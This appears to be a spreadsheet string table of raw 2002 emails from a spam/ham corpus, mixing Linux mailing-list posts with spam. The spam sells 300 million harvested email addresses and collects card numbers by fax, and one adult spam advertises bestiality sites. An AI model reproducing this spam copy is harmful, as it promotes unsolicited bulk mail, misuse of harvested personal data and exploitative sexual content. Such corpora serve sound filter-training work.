 &gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/CENTER&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/=
 CENTER&gt;&lt;/CENTER&gt;&lt;/CENTER&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 3 Cd Package: 300 Million Email Addresses + 1.5 Mil Fax Numbers $99.95
</t>
  </si>
  <si>
    <t xml:space="preserve">NEW - NEW - NEW   IN THE MARKET
 JUST RELEASED:
 300 Million email addresses--Database Fully Exportable, On 3 CDs!!
 300 Million email addresses--Database Fully Exportable, On 3 CDs!! =Only $99.95
 ** Contains US &amp; International EMAILS ** 
 With 1.5 Million USA Business Fully Exportable Fax Numbers,   
 ALL TWO DIRECTORIES ABOVE (300 Million and faxes #)	 ** ONLY $99.95 **
 BOTH EMAIL DIRECTORIES ARE CATEGORIZED
 Email Address CDROM (300 Million Addresses)
 MORE THAN 134 CATEGORIES SUCH AS:
 USA--50 STATES AND AREA CODE:
 Contains e-mail addresses of people living in all 50 states. Each state is broken down by area codes. 
 Canada and Area Code:
 Contains e-mail addresses of people living in Canada. Each province is
 broken down by area codes
 Adult:
 Contains e-mail addresses of people interested in adult content
 Auto:
 Contains e-mail addresses of people interested in automotive content
 Canada:
 Contains e-mail addresses of people living in Canada. Each province is broken
 down by area codes.
 Classifieds:
 Contains e-mail addresses of people advertising in classifieds and people that
 are interested in classifieds
 Culture:
 Contains e-mail addresses of people interested in antiques, art, entertainment,
 fashion, movies, etc.
 Dining:
 Contains e-mail addresses of people interested in drinking beer, cooking, dining
 out, etc.
 Gambling:
 Contains e-mail addresses of people interested in gambling
 Gardening:
 Contains e-mail addresses of people interested in gardening
 Geographic:
 Contains e-mail addresses of people residing in different cities and counties,
 broken down by city name
 Golf:
 Contains e-mail addresses of people interested in golf
 Health:
 Contains e-mail addresses of people interested in fitness, weight loss, etc.
 Home Business:
 Contains e-mail addresses of people interested in running a home based business,
 or are already operating a home based business
 Hot List:
 Contains e-mail addresses of people interested in online shopping
 International:
 Contains e-mail addresses of people living in different countries, broken down
 by name of the country
 Internet:
 Contains e-mail addresses of people who registered a domain name in the past 2 months
 Investments:
 Contains e-mail addresses of people interested in investing in the market
 Misc:
 Contains e-mail addresses of people interested in auctions, boating
 Books:
 Coupons, credit, fishing, mortgage, politics, real estate, religion, trade
 shows, etc.
 Music:
 Contains e-mail addresses of people interested in music
 Internet Market:
 Contains e-mail addresses of people interested in Internet Market places
 Opportunity Seekers:
 Contains e-mail addresses of people interested in different opportunities
 Opt-In:
 Contains e-mail addresses of people interested in Opt-In
 Outdoors:
 Contains e-mail addresses of people interested in outdoor activity
 Pet Lovers:
 Contains e-mail addresses of people interested in pets
 Psychic:
 Contains e-mail addresses of people interested in psychics
 Publishing:
 Contains e-mail addresses of people interested in publishing
 Recreation:
 Contains e-mail addresses of people interested in different recreational
 activities.
 Sci-Fi:
 Contains e-mail addresses of people interested in Sci-Fi
 Show Business:
 Contains e-mail addresses of people interested in show business
 Sports:
 Contains e-mail addresses of people interested in sports
 Health:
 Contains e-mail addresses of people interested in health
 Web design:
 Contains e-mail addresses of people interested in web designs
 Travel:
 Contains e-mail addresses of people interested in traveling
 Super List:
 Contains e-mail addresses of people who have bought more than $2,000.00 over the
 Internet in the last 4 months
 The Tropics:
 Contains e-mail addresses of people who live in the Antigua, Bahamas, Barbados,
 Bermuda, British Virgin Islands, Caribbean Islands, Cayman Islands, Grenada,
 Guam, Jamaica, Puerto Rico, St. Kitts &amp; Nevis, St. Lucia, Trinidad &amp; Tobago,
 Turks &amp; Caicos Islands, US Virgin Islands, etc. broken down by area codes
 AND MANY MORE!
 *Everything on this disk is in TEXT file format and is fully exportable.
 *The CD is as easy to use as browsing your C drive in Explorer.
 Just think of it, over 300 million people will see your advert, if only a fraction of them was to buy your product/services, think of all the money you would be earning. 
 Are the fax numbers fresh? How many are deliverable? 
 The 1.5 million fax number list has been verified within the last three months and is very fresh and deliverable. 
 Are the fax numbers sorted by name or business type? 
 The 1.5 million fax number list is sorted by area code only. It is not sorted by business name, business type. 
 What file format are the fax numbers in? 
 The 1.5 million fax number list is in a standard text file format (.txt), and is not separated by commas or quotes. The list is compiled in a one-fax number per line method, suitable for importing into most of the popular fax software programs.
 ** The CD is as easy to use as browsing your C drive in Explorer. **
 NOW YOU CAN ADVERTISE FREE AND GET TREMENDOUSLY
 MORE RESPONSES THAN ADVERTISING WITH OTHER FORMS OF MEDIA!! ORDER NOW
 HOW THIS DIRECTORY WAS COMPILED:
 * Virtually every other email directory on the Internet was taken and put through an extensive email verification process thus eliminating all the dead addresses.
 * Special software spiders through the web searching websites, newsgroups and many other online databases with given keywords like area codes, industries, city names etc.. To find millions of fresh new addresses every week.
 TURN YOUR COMPUTER INTO A MONEY MACHINE!
 Most estimate well over 400 MILLION people will have E-mail accounts in the next 2Years!  E-Mail turns your computer into a Money Machine by giving you, immediate access to all of them. Don't you think some of the more than 300 million people with E-mail addresses would be interested in your products or Services?
 MUCH FASTER:  With E-mail you get responses back in 1 to 4 days instead of waiting weeks or months!  You can begin filling orders the same day you send E-mail 
 ADVERTISING WORTH MILLIONS:  It costs millions of dollars to mail.
 DO NOT REPLY TO THIS E-MAIL ADDRESS. TO ORDER, READ BELOW:
 ORDER BY CREDIT CARD (VISA, MASTERCARD OR AMERICAN EXPRESS) Simply complete the order form below and fax it back
  TO   1- (240) 371-0672
 Make sure that we have your e-mail address so that we can send you a reciept for your transaction.
 CREDIT CARD ORDERS FAX THIS ORDER FORM BACK
 TO   1- (240) 371-0672
 ORDER FORM (Please PRINT clearly)
 Name:										
 Company Name:									
 Email Address:								
 Tel#:										
 Shipping Address:								
 City:											
 State/Province:									 
 Zip/Postal Code:	 							
 Country:											
 PRODUCT ORDER FORM:
 [ ] 300 MILLION EMAIL ADDRESSES on 3 CDs		$  99.95
      And 1. Million USA Business Fax Numbers			
 SHIPPING OPTIONS
 [ ] Regular Mail (1-2)weeks delivery 	     $  5.50
 [ ] Priority Mail(2-4)business days 		     $12.50
 [ ] FedEx Overnight For US &amp; Canada Only  $25.50 Int'l orders extra                                                      
 Only For FedEx
 TOTAL AMOUNT TO BE PAID: 	$			USD
 FOR CREDIT CARD ORDERS, THIS INFO MUST BE ENCLOSED:
 [] VISA  [] MASTERCARD  [] AMERICAN EXPRESS
 Card #:											
 Expiry Date:										
 Name on Card:								  		
 City:											
 State/Province:									 
 Zip/Postal Code:	 							
 Country:											
 Last 3 digits on reverse of card next to signature:
 (     ) - (     ) - (     ) 
 TOTAL AMOUNT: $			USD
 I agree to pay the above total amount according to my card issuer agreement.
 Authorized Signature: X			 Date:	   2002	
 Please note that FT International will appear on your statement.
 CREDIT CARD ORDERS FAX THIS ORDER FORM BACK
 TO   1- (240) 371-0672
 MAIL ORDERS SEND THIS ORDER FORM BACK TOGETHER WITH A MONEY ORDER PAYABLE TO (F.T International). FOR THE BALANCE TO:
 MAILING ADDRESS:
 FUTURE TECH INTERNATIONAL
 Import Export Company
 1300 Don Mills Road Suite 211
 Don Mills Ontario, Canada 
 M3B 2W6
 PLEASE DO NOT SEND POSTAL MONEY ORDERS
 FOR ANY QUESTIONS PLEASE FEEL FREE TO CALL US AT 1 (416) 410-9364
 To be removed from our database please send a fax to   1-970-289-6524
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Pravda reports cities on the moon!
</t>
  </si>
  <si>
    <t xml:space="preserve">From: Steve Speer
 Subject: http://english.pravda.ru/main/2002/10/05/37771.html
 [not sure what the rules for crossposting between the two groups is...
   my reasoning is that it's a major newspaper reporting evidence of
   alien life so.... /t]
 -- 
 http://loopNY.com ......................An "open loop": shows every Saturday!
 http://extremeNY.com/submit .......................... submit to the calendar.
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Sell a Home with Ease!
 http://us.click.yahoo.com/SrPZMC/kTmEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] Poker for money againts real players
</t>
  </si>
  <si>
    <t xml:space="preserve">Get your favorite Poker action at http://www.multiplayerpoker.net
 Play against real people from around the world for real money or just
 for fun.  Access one of the busiest poker rooms online.  We've dealt
 over 8 million hands!  Experience the best poker software available
 today featuring world class graphics, true random shuffling algorithms,
 and 24x7 customer service.  We've got a great selection of poker games
 for you to play such as:
 Hold'em, Omaha
 Omaha Hi/Lo
 7 Card Stud
 7 Card Stud Hi/Lo
 5 Card Stud
 Poker tournaments
 Sign up today and start playing with new &amp; old friends...download our free
 software now at http://www.MultiPlayerPoker.net
 Current Promotion:
    $50 Deposit Bonus! - 100% bonus!
    Daily High Hand - $250 Daily.
    Progressive Bad Beat Jackpot - $2,000.00 minimum with $100.00 added
 daily.
    Tournaments - Multiplayer shootouts.
 wish not to received any further e-mail from us please click
 http://www.centralremovalservice.com/cgi-bin/poker-remove.cgi
 (I3-SS3)
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Exit.status =13 ?
</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,
  Always for my script, if i run it manually in console all is ok
  whether is the user.
  But if i try to implement it in my general script filter running
  whith qmailq UID (503) :
  I've got 13 has exit status, and in my mail log :
  "Can't call method "log" on unblessed reference at
   /usr/lib/perl5/site_perl/5.6.0/Razor2/Client/Agent.pm line 211."
   My log file is in /home/user/.razor/razor-agent.log
   and have write permission for qmailq user.
   Any idea ??
 --
 Toorop 
 Lorsque que vous avez limin l'impossible, ce qui reste, 
 mme si c'est improbable, doit tre la vrit.
 www.spoonsdesign.com
 ---------------------------------
 Mail scann par Protecmail filter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</si>
  <si>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This message is in MIME format. Since your mail reader does not understand
 this format, some or all of this message may not be legible.
 ------_=_NextPart_001_01C24949.8F9C7170
 Content-Type: text/plain;
 	charset="iso-8859-1"
 The best comparison for India is China. They have similar population,
 resources and
 historical misfortunes. They even had similar per captia income years back. 
 As of today, you definitely see more products made in China than in India.
 So if 
 you think material well being is what defines a better nation, then you
 should look 
 at what China is doing differently from India.
 ------_=_NextPart_001_01C24949.8F9C7170
 Content-Type: text/html;
 	charset="iso-8859-1"
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"&gt;
 &lt;META NAME="Generator" CONTENT="MS Exchange Server version 5.5.2653.12"&gt;
 &lt;TITLE&gt;RE: The Curse of India's Socialism&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;P&gt;&lt;FONT SIZE=2&gt;The best comparison for India is China. They have similar population, resources and&lt;/FONT&gt;
 &lt;BR&gt;&lt;FONT SIZE=2&gt;historical misfortunes. They even had similar per captia income years back. &lt;/FONT&gt;
 &lt;BR&gt;&lt;FONT SIZE=2&gt;As of today, you definitely see more products made in China than in India. So if &lt;/FONT&gt;
 &lt;BR&gt;&lt;FONT SIZE=2&gt;you think material well being is what defines a better nation, then you should look &lt;/FONT&gt;
 &lt;BR&gt;&lt;FONT SIZE=2&gt;at what China is doing differently from India.&lt;/FONT&gt;
 &lt;/P&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 ------_=_NextPart_001_01C24949.8F9C7170--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Oct 07, 2002 at 11:05:21PM +0200, Matthias Saou wrote:
 &gt; I've put up a new Red Hat Linux 8.0 build of nessus here :
 &gt; http://ftp.freshrpms.net/pub/freshrpms/testing/nessus/
 &gt; 
 &gt; It's 100% untested, although the build should be ok. The new menu was
 &gt; added, but some configuration files may be better with new or different
 &gt; defaults.
 &gt; 
 &gt; Feedback is very welcome!
 It works very nice, would you consider upgrading it to 1.2.6 released only a
 few hours after your build?
 Thanks!
 On Tue, Oct 08, 2002 at 01:49:11PM +0200, Renaud Deraison wrote:
 &gt; I'm pleased to announce the availability of Nessus 1.2.6, which should
 &gt; be one of the last versions of Nessus 1.2.x (hopefully), as I will soon
 &gt; open a new unstable tree and start to break things again :)
 &gt; 
 &gt; What is new in Nessus 1.2.6, in comparison to 1.2.5 :
 &gt; 
 &gt; * changes by Michael Slifcak (Michael.Slifcak at guardent.com)
 &gt;      + Added Bugtraq cross reference in the plugins
 &gt;      + Added support for BID in nessusd (this has yet to be done on
 &gt;        the client side)
 &gt;        
 &gt; * changes by Axel Nennker (Axel.Nennker at t-systems.com)
 &gt;      + fixed the xml and html outputs
 &gt;      + fixed array issues in a couple of plugins
 &gt;      
 &gt; * changes by Michel Arboi (arboi at bigfoot.com)
 &gt;      + find_service now detects services protected by TCP wrappers
 &gt;        or ACL
 &gt;      + find_service detects gnuserv
 &gt;      + ptyexecvp() replaced by nessus_popen() (*)
 &gt;      
 &gt; * changes by Renaud Deraison (deraison at cvs.nessus.org)
 &gt;      + Fixed a bug which may make nasl interpret backquoted strings
 &gt;        (\n and \r) received from the network (problem noted by Pavel
 &gt;        Kankovsky)
 &gt;      + nmap_wrapper.nes calls _exit() instead of exit() (*)
 &gt;      + Solved the lack of bpf's on Free/Open/NetBSD and MacOSX by
 &gt;        sharing _one_ among all the Nessus processes. As a result,
 &gt;        Nessus's ping is much more effective on these platforms
 &gt;      + bugfix in plug_set_key() which would eventually make some
 &gt;        scripts take too long when writing in the KB
 &gt;      + Plugins of family ACT_SETTINGS are run *after* plugins of
 &gt;        family ACT_SCANNERS
 &gt;      + replaced the implementation of md5 which was used when
 &gt;        OpenSSL is disabled by the one from RSA (the old one would
 &gt;        not work on a big-endian host)
 &gt;      + Fixed plugins build issues on MacOS X
 &gt;      + The nessus client compiles and links against GTK+-2.0. Of
 &gt;        course, it will be horrible and unstable, as the GTK team
 &gt;        does not care about backward compatibility
 &gt;   
 &gt; (*) These two modifications solve the problems of nmap hanging under FreeBSD
 &gt; 
 &gt; 
 &gt; 
 &gt; Special thanks go to Michael Slifcak, whose work on Nessus during the
 &gt; last months have been truly appreciated even if they have not always
 &gt; been as underlined as they should have been. Michael, thanks again !
 &gt; 
 &gt; 
 &gt; AVAILABILITY:
 &gt; 
 &gt; Nessus 1.2.6 is available at http://www.nessus.org/posix.html
 -- 
 Axel.Thimm@physik.fu-berlin.de
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] [OT] Dell machine giving me hassle.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; -----Original Message-----
 &gt; From: Aherne Peter-pahern02 [mailto:peter.aherne@motorola.com]
 &gt; Sent: 28 August 2002 09:29
 &gt; To: 'ilug@linux.ie'
 &gt; Subject: [ILUG] [OT] Dell machine giving me hassle.
 &gt; 
 &gt; Ok, Iknow this is blatantly OT but I'm beginning to go insane.
 &gt; Had an old Dell Dimension XPS sitting in the corner and decided to
 &gt; put it to use, I know it was working pre being stuck in the
 &gt; corner, but when I plugged it in, hit the power nothing happened.
 &gt; I opened her up and had a look and say nothing much. A little orange
 &gt; LED comes on when I plug her in but that's it, after some googling
 &gt; I found some reference to re-seating all the parts, but no change.
 &gt; The problem I'm having is that since the power supply is some Dell
 &gt; specific one, ATX block with what looks like one of the old AT
 &gt; power connectors, I cant figure out weather this is a Mobo prob
 &gt; or a PSU prob. Just to futily try and drag this back OT, I want
 &gt; to install Linux on it when I get it working. If anyone knows
 &gt; what the problem might be give me a shout.
 Here is what you do.
 Remove all the PCI &amp; ISA/EISA cards.
 Remove the floppy disk cable from the mobo, the ide cables from the mobo...
 essentially leaving only a video card... ram and a keyboard plugged in.
 Turn on the system.
 If it doesn't POST then, switch it off and remove the video card.
 Switch it back on ... if your mobo doesn't emit some beeps complaining about
 lack of video card then.
 Switch it off.
 Remove it's ram.
 Same procedure as above.
 If you still don't have any kind of mobo beep codes then you can try as a
 last ditch effort to reseat the cpu... (remembering to never ever ever power
 up your system without a heatsink &amp; fan).
 If after reseating the cpu into the mobo... you still get no beep codes,
 from it with just the cpu inserted into the mobo ie(no pci,*isa cards or and
 no actual ide or floppy cables connected to the system)... even though you
 have power... you either have a faulty motherboard or a faulty cpu.
 Once you get beep codes various permutations of the above should eventually
 disjunct which device it is, is causing the lack of POST.
 Power On Self Test.
 Bod
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">[Skip Montanaro]
 &gt; That has the nasty side effect of placing all .py files in the package.
 &gt; What about obvious executable scripts (like timtest or hammie)?  How can I
 &gt; keep them out of the package?
 Put them in a scripts folder?
 // m
 -
</t>
  </si>
  <si>
    <t xml:space="preserve">I agree w/ ya Tom.  That kind of thinking is SO idiotic.  Sure, gays are 
 promiscuous, and so are hets, but I betcha gays are more AIDSphobic than 
 hets, generally speaking....
 C
 On Sun, 8 Sep 2002, Tom wrote:
 &gt; On Sun, 8 Sep 2002, Eugen Leitl wrote:
 &gt; 
 &gt; --]doesn't look particularly difficult to do.
 &gt; --]
 &gt; --]Clearly this is not something what hets do, prostitution not taken into
 &gt; --]account.
 &gt; 
 &gt; So lets see, hets dont go to swing clubs, meat markets or the like at all?
 &gt; Hmm. And being gay means hanging in the bath house being a cum dumpster
 &gt; while you listen to the Devine Ms M belt one out for the boys?
 &gt; 
 &gt; Ugh, with thinking like this who needs the bible belt?
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ------=_NextPart_001_0004_01C2655A.4ABB3500
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 ----- Original Message -----
 From: Joseph S. Barrera III
 Sent: Wednesday, September 25, 2002 7:06 PM
 To: FoRK
 Subject: dumb question: X client behind a firewall?
 Let's say you're behind a firewall and have a NAT address.
 Is there any way to telnet to a linux box out there in the world
 and set your DISPLAY in some way that you can create
 xterms on your own screen?
 - Joe
 --------------------
 I'm in no way a pro but perhaps you could set your Firewall to accept con=
 nections from that Linux box and then somehow set the Linux box to transm=
 it on a specific port. Then configure your router to forward all informat=
 ion from that port to your box.
 But then again, that pretty much defeats the entire point of a firewall =3D=
 P.Get more from the Web.  FREE MSN Explorer download : http://explorer.ms=
 n.com
 ------=_NextPart_001_0004_01C2655A.4ABB3500
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;HTML&gt;&lt;BODY STYLE=3D"font:10pt verdana; border:none;"&gt;&lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt; &lt;=
 DIV&gt;&amp;nbsp;&lt;/DIV&gt; &lt;BLOCKQUOTE style=3D"PADDING-RIGHT: 0px; PADDING-LEFT: 5=
 px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid; MARGIN-RIGHT: 0px"&gt;=
  &lt;DIV style=3D"FONT: 10pt Arial"&gt;----- Original Message -----&lt;/DIV&gt; &lt;DIV =
 style=3D"BACKGROUND: #e4e4e4; FONT: 10pt Arial; COLOR: black"&gt;&lt;B&gt;From:&lt;/B=
 &gt; Joseph S. Barrera III&lt;/DIV&gt; &lt;DIV style=3D"FONT: 10pt Arial"&gt;&lt;B&gt;Sent:&lt;/B=
 &gt; Wednesday, September 25, 2002 7:06 PM&lt;/DIV&gt; &lt;DIV style=3D"FONT: 10pt Ar=
 ial"&gt;&lt;B&gt;To:&lt;/B&gt; FoRK&lt;/DIV&gt; &lt;DIV style=3D"FONT: 10pt Arial"&gt;&lt;B&gt;Subject:&lt;/B=
 &gt; dumb question: X client behind a firewall?&lt;/DIV&gt; &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt; &lt;P&gt;L=
 et's say you're behind a firewall and have a NAT address.&lt;BR&gt;Is there any=
  way to telnet to a linux box out there in the world&lt;BR&gt;and set your DISP=
 LAY in some way that you can create&lt;BR&gt;xterms on your own screen?&lt;BR&gt;&lt;BR&gt;=
 - Joe&lt;/P&gt; &lt;P&gt;&amp;nbsp;&lt;/P&gt; &lt;P&gt;--------------------&lt;/P&gt; &lt;P&gt;I'm in no way a pr=
 o but perhaps you could set your Firewall to accept connections from that=
  Linux box and then somehow set the Linux box to transmit on a specific p=
 ort. Then configure your router to forward all information from that port=
  to your box.&lt;/P&gt; &lt;P&gt;&amp;nbsp;&lt;/P&gt; &lt;P&gt;But then again, that pretty much defea=
 ts the entire point of a firewall =3DP.&lt;/P&gt;&lt;/BLOCKQUOTE&gt;&lt;/BODY&gt;&lt;/HTML&gt;&lt;br=
  clear=3Dall&gt;&lt;hr&gt;Get more from the Web.  FREE MSN Explorer download : &lt;a =
 href=3D'http://explorer.msn.com'&gt;http://explorer.msn.com&lt;/a&gt;&lt;br&gt;&lt;/p&gt;
 ------=_NextPart_001_0004_01C2655A.4ABB3500--
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 01:40:21AM +0200, Paul Linehan mentioned:
 &gt; And, as I've tried to explain, is not the licence
 &gt; terms on, say, trials for commercial company x
 &gt; to which I object, it is the way SuSE appears, 
 &gt; at least to my I.T. peasant self, to have
 &gt; mixed up proprietary and open stuff.
  Indeed. Personally, I think it's the sort of reprehensible behavior that
 split Unix way-back-when into the mess it was in a few years back, before
 Linux...got rid of most of them.
  Vendors wrote their own wierd-ass installers &amp; config tools to lock
 people to their OS, they added all sorts of functionality that was not
 availible to other OSes to make themselves different from the competition
 (Motif on non-free OSes, incompatible filesystems etc).
  While a good idea when you share code &amp; standards, in an environment
 where you do neither, the user suffers.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Daniel Berlinger has noticed that Mac software shops are starting
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.joelonsoftware.com/news/20020910.html
 Date: Not supplied
 Daniel Berlinger has noticed[1] that Mac software shops are starting to move to 
 OS X-only development. This makes sense, for two reasons. First, most people 
 who pay for software have new computers. So while OS X may only have a small 
 fraction of the installed base, it has the majority of the population of people 
 who are opening their wallets. Second, if OS X isn't successful, the Mac is _
 over_. It's not like System 9 is getting any more popular. 
 Then again, there are very few conditions under which it is actually the right 
 business decision to develop software for the Macintosh. Developing for the Mac 
 is not a whole lot different than creating a web site _that only works on 
 Netscape_. (Given the market share of Macs[2] (about 3.5%) and the market share 
 of Netscape[3] (about 3.4%), that is not a silly comparison.) 
 Robb Beal wrote[4]: "Try this test. Go to a venture firm, angel, or big company 
 with a Mac OS X product/concept/prototype. Do they consider the fact that it's 
 a Mac application a net plus? (No.)" Well _duh_. Your product would have to 
 appeal to _25 times more Mac _users_ _[as a percentage] than Windows users just 
 to break even. In other words, if your Windows product appeals to 1 in 100 
 Windows users, you have to appeal to 25 in 100 Mac users to make the same 
 amount of money. 
 Now, you may want to make an _emotional_ appeal to developing for the Mac. 
 That's fine. If you like Macs and you're doing it for fun, more power to ya. 
 But as long as we're talking _investment_, you have to tell me why you're going 
 to get 25 times as many users. Maybe there's less competition in your category 
 on the Mac; maybe you're in a niche like graphics where it seems like Macs 
 dominate (they don't, it just seems that way because the elite graphics people 
 in big American cities use Macs); maybe your product can't sell to mixed 
 environments unless it runs everywhere. But if you want to make an investment 
 in Mac software be prepared to demonstrate how you're going to overcome that 
 magic 25 multiplier.
 [1] http://archipelago.phrasewise.com/2002/09/10
 [2] http://maccentral.macworld.com/news/0207/03.marketshare.php
 [3] http://websidestory.com/cgi-bin/wss.cgi?corporate&amp;news&amp;press_1_193
 [4] http://radio.weblogs.com/0001123/2002/04/10.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Fw: User Name &amp; Password to Membership To 5 Sites zzzz@example.com pviqg
</t>
  </si>
  <si>
    <t xml:space="preserve">##################################################
 #                                                #
 #                 Adult Club                     #
 #           Offers FREE Membership               #
 #                                                #
 ##################################################
 &gt;&gt;&gt;&gt;&gt;  INSTANT ACCESS TO ALL SITES NOW
 &gt;&gt;&gt;&gt;&gt;  Your User Name And Password is.
 &gt;&gt;&gt;&gt;&gt;  User Name: zzzz@example.com
 &gt;&gt;&gt;&gt;&gt;  Password: 760382
 5 of the Best Adult Sites on the Internet for FREE!
 ---------------------------------------
 NEWS 08/18/02
 With just over 2.9 Million Members that signed up for FREE, Last month there were 721,184 New
 Members. Are you one of them yet???
 ---------------------------------------
 Our Membership FAQ
 Q. Why are you offering free access to 5 adult membership sites for free?
 A. I have advertisers that pay me for ad space so you don't have to pay for membership.
 Q. Is it true my membership is for life?
 A. Absolutely you'll never have to pay a cent the advertisers do.
 Q. Can I give my account to my friends and family?
 A. Yes, as long they are over the age of 18.
 Q. Do I have to sign up for all 5 membership sites?
 A. No just one to get access to all of them.
 Q. How do I get started?
 A. Click on one of the following links below to become a member.
 - These are multi million dollar operations with policies and rules.
 - Fill in the required info and they won't charge you for the Free pass!
 - If you don't believe us, just read their terms and conditions.
 ---------------------------
 # 5. &gt; Adults Farm
 http://80.71.66.8/farm/?aid=760382
 Girls and Animals Getting Freaky....FREE Lifetime Membership!!
 # 4. &gt; Sexy Celebes
 http://80.71.66.8/celebst/?aid=760382
 Thousands Of XXX Celebes doing it...FREE Lifetime Membership!!
 # 3. &gt; Play House Porn
 http://80.71.66.8/mega/?aid=760382
 Live Feeds From 60 Sites And Web Cams...FREE Lifetime Membership!!
 # 2. &gt; Asian Sex Fantasies
 http://80.71.66.8/asian/?aid=760382
 Japanese Schoolgirls, Live Sex Shows ...FREE Lifetime Membership!!
 # 1. &gt; Lesbian Lace
 http://80.71.66.8/lesbian/?aid=760382
 Girls and Girls Getting Freaky! ...FREE Lifetime Membership!!
 --------------------------
 Jennifer Simpson, Miami, FL
 Your FREE lifetime membership has entertained my boyffriend and I for
 the last two years!  Your Adult Sites are the best on the net!
 Joe Morgan Manhattan, NY
 Your live sex shows and live sex cams are unbelievable. The best part
 about your porn sites, is that they're absolutely FREE!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http://80.71.66.8/optout/ . Please allow 24 hours for removal.
 vonolmosatkirekpups
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 
</t>
  </si>
  <si>
    <t xml:space="preserve">This is an HTML email message.  If you see this, your mail client does not support HTML messages.
 ------=_NextPart_OOMLWVMESG
 Content-Type: text/html;charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 &lt;TABLE border=0 cellPadding=0 cellSpacing=10 height=416 width="75%"&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD align=middle bgColor=#0000ff colSpan=3 height=28 vAlign=center width="100%"&gt;&lt;STRONG&gt;&lt;BIG&gt;&lt;BIG&gt;THANK YOU FOR SHOPPING WITH US&lt;/BIG&gt;&lt;/BIG&gt;&lt;/STRONG&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD align=middle height=108 vAlign=top width="19%"&gt;
 &lt;P align=center&gt;&lt;EM&gt;&lt;STRONG&gt;&lt;FONT color=#ff0000&gt;GIFTS FOR ALL OCCASIONS&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/EM&gt;&lt;/P&gt;
 &lt;P align=center&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=center&gt;FREE GIFT WITH $50.00 PURCHASE&lt;/P&gt;&lt;/TD&gt;
 &lt;TD align=middle height=108 vAlign=center width="31%"&gt;&lt;IMG alt="31509.jpg (37077 bytes)" height=186 src="http://www.marysstore.com/images/products/images/31509.jpg" width=185&gt;&lt;/TD&gt;
 &lt;TD align=left height=108 vAlign=top width="45%"&gt;&lt;FONT face=Arial size=2&gt;For a limited time only, receive this 11 plush Santa Bear, FREE, with your purchase of $50.00 or more. 
 &lt;P&gt;When your order totals $50.00 or more (order must be $50.00 or more before shipping and handling) this Santa Bear is added to your cart for free, while supplies last.&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD height=250 width="19%"&gt;&lt;IMG alt="wpe8.jpg (15433 bytes)" height=248 src="http://www.marysstore.com/images/products/newpag1.jpg" width=174&gt;&lt;/TD&gt;
 &lt;TD align=left colSpan=2 height=250 vAlign=top width="69%"&gt;
 &lt;P align=left&gt;&lt;FONT color=#0000ff&gt;Mary's Store would like to thank you for being a valued customer.&amp;nbsp;&amp;nbsp; As our way of saying thanks to you, the customer, we are offering a 15% discount&amp;nbsp; on all purchases made during the month of&amp;nbsp; November.&amp;nbsp; Just enter the word:&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=center&gt;&lt;FONT color=#0000ff&gt;&lt;STRONG&gt;THANKS&lt;/STRONG&gt;&amp;nbsp;&amp;nbsp; &lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=left&gt;&lt;FONT color=#0000ff&gt;In the discount code box during checkout to receive your automatic 15% discount.&lt;/FONT&gt;&lt;/P&gt;
